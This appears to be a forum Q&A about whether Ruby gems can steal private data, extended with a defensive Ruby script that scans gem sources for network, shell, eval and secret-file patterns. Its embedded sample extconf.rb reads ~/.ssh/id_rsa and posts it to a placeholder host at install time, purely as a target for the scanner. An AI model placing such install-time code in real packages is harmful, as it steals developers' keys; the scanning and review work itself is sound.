I was just about to install a Ruby gem by someone I hadn’t heard of. But something made me think “Who is this guy?”. Is there any risk of a Ruby gem accessing private data on your machine and transmitting it elsewhere – since the gem system has Internet access? Or are there protections against this?
Of course there is. You’re installing software on your computer that runs with the privileges of the script/user that calls it. It’s probably easier to spot malicious code in pure Ruby than in binary packages. But if you think source inspection is a guaranteed way to spot malicious code, check out the Underhanded C Contest.
That said, if you want to write malware there are more effective delivery systems than Ruby gems. I would not be surprised if the number of actual malicious gems in existence is 0, and thus that the probability that this one is malicious is likewise 0…
See: http://rubygems.org/read/chapter/14#page61
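A practical follow-up to the answer above: since a gem runs with your privileges, and a gem's `extconf.rb` (and anything listed in the spec's `extensions`) runs at `gem install` time before you ever `require` it, it is worth looking at the sources before installing. The script below is an added example, not code from the question, the answer, or RubyGems itself. It fetches nothing: the gem contents are a small constructed sample embedded inline (the gem name, file names and the `example.invalid` host are made up), and the regexes are a coarse heuristic that points a human reviewer at lines to read, not a verdict. The `scan_gem_file` helper uses the real `Gem::Package` API to run the same scan over a `.gem` you obtained with `gem fetch NAME` (which downloads without installing).

```ruby
require "rubygems"
require "rubygems/package"
require "tmpdir"

# Coarse patterns a reviewer would want to read by hand before installing.
# Heuristic only: legitimate gems use Net::HTTP and system() too; the point is
# to surface those lines, especially in files that run at install time.
SUSPICIOUS_PATTERNS = {
  "network" => %r{\bNet::HTTP\b|net/http|open-uri|\bTCPSocket\b|\bURI\.open\b},
  "shell"   => %r{\bsystem\(|\bexec\(|\bspawn\(|IO\.popen|Open3|%x\(|`[^`]+`},
  "eval"    => /\b(?:eval|instance_eval|class_eval|module_eval)\b/,
  "secrets" => %r{\.ssh/|\.gnupg|\.aws/|\.netrc|ENV\[["'](?:AWS|GITHUB|TOKEN|SECRET|PASS)},
}.freeze

# Constructed sample of a gem's contents (path => source). The gem, files and
# host are hypothetical; the extconf.rb is written to look like the worst case.
SAMPLE_GEM_FILES = {
  "lib/tidy_strings.rb" => <<~'RUBY',
    # Harmless: the gem's advertised functionality.
    module TidyStrings
      def self.squish(s)
        s.strip.gsub(/\s+/, " ")
      end
    end
  RUBY
  "ext/tidy_strings/extconf.rb" => <<~'RUBY',
    # Runs during gem install, before the user ever requires the gem.
    require "net/http"
    keys = File.read(File.expand_path("~/.ssh/id_rsa")) rescue ""
    Net::HTTP.post(URI("http://example.invalid/collect"), keys)
    `touch /tmp/installed`
    File.write("Makefile", "all:\n\ttrue\ninstall:\n\ttrue\n")
  RUBY
}.freeze

# Scan a path => source hash. `extensions` is the spec's extensions list; those
# files, plus any extconf.rb, are flagged as running at install time.
def scan_sources(files, extensions: [])
  findings = []
  files.each do |path, source|
    install_time = path.end_with?("extconf.rb") || extensions.include?(path)
    source.each_line.with_index(1) do |line, lineno|
      next if line.lstrip.start_with?("#") # comment-only lines carry no code
      SUSPICIOUS_PATTERNS.each do |category, re|
        next unless line.match?(re)
        findings << { path: path, line: lineno, category: category,
                      install_time: install_time, text: line.strip }
      end
    end
  end
  findings
end

# Same scan over a real .gem file (e.g. from `gem fetch NAME`), using the
# RubyGems package reader. Only Ruby sources and Rakefiles are inspected.
def scan_gem_file(gem_path)
  pkg = Gem::Package.new(gem_path)
  files = {}
  Dir.mktmpdir do |dir|
    pkg.extract_files(dir)
    pkg.contents.each do |rel|
      full = File.join(dir, rel)
      next unless File.file?(full) && (rel.end_with?(".rb") || rel.end_with?("Rakefile"))
      files[rel] = File.read(full)
    end
  end
  scan_sources(files, extensions: pkg.spec.extensions)
end

def format_findings(findings)
  findings.map do |f|
    when_ = f[:install_time] ? "INSTALL-TIME" : "runtime"
    "#{when_} #{f[:category]} #{f[:path]}:#{f[:line]}: #{f[:text]}"
  end
end

if __FILE__ == $PROGRAM_NAME
  findings = ARGV[0] ? scan_gem_file(ARGV[0]) :
    scan_sources(SAMPLE_GEM_FILES, extensions: ["ext/tidy_strings/extconf.rb"])
  puts format_findings(findings)
end
```

Run it with no arguments to see the sample flagged, or `ruby scan.rb some-gem-1.0.0.gem` after `gem fetch some-gem`. The install-time marker is the part worth acting on: a runtime hit can be checked against what the gem claims to do, but an `extconf.rb` that opens sockets or reads `~/.ssh` executes the moment you type `gem install`.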